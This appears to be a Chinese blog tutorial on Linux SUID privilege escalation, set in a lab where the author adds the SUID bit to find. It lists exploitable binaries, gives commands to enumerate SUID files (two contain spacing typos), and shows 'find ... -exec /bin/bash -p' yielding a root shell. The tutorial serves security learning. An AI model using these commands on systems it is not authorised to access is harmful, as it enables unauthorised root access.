Linux下SUID提权方法

目录

SUID

1. 利用find文件提权

vulnhub靶机DC-1渗透—SUID提权


SUID

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

已知的可用来提权的linux可行性的文件列表如下:

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有者即root的权限去执行。意思就是当普通用户执行2.txt时会拥有root权限

-rwsr-xr-x –用's'字符代替'-'表示SUID位被设置

chmod u+s 文件名

 我们可以用以下命令发现系统上运行的所有SUID可执行文件。

#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

1. 利用find文件提权

实验环境:

假如我们现在拿到了一个网站服务器的shell,但是权限是普通用户,我们现在需要提权到 root 用户权限。

 此时,我们首先查看具有root用户权限的SUID文件

find / -perm -u=s -type f 2>/dev/null

这里我们发现了find文件(因为实验需要,这里find文件的suid权限是我自己加上去的)

 继续查看find信息,确实是root权限的suid文件

  接下来我们就用find进行权限提升,执行如下命令,显示root

/usr/bin/find 系统中存在的文件名 -exec 命令 \;

 即,我们可以继续执行以下命令,可以看到获取的shell为root权限。

find /etc/passwd -exec /bin/bash -p \;

 ps:这里也可以通过nc或则python脚本进行反弹,但本质上目的都是获取一个root权限的shell。而且通过nc或者python脚本反弹的shell很可能还是普通用户权限,所以建议直接使用上面那种方法。

vulnhub靶机DC-1渗透—SUID提权

——> https://chenchena.blog.csdn.net/article/details/123617568

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢北先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值